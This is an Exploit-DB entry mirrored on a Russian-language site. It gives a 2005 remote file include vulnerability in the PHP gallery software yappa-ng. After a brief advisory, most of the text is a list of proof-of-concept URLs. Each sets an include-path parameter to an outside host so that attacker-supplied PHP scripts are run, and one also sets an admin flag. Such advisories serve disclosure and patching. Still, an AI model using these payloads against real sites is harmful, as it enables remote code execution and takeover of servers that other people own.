- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25532
- Проверка EDB
-
- Пройдено
- Автор
- GULFTECH SECURITY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2005-04-24
Код:
source: https://www.securityfocus.com/bid/13371/info
yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts.
The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software.
http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/
- Источник
- www.exploit-db.com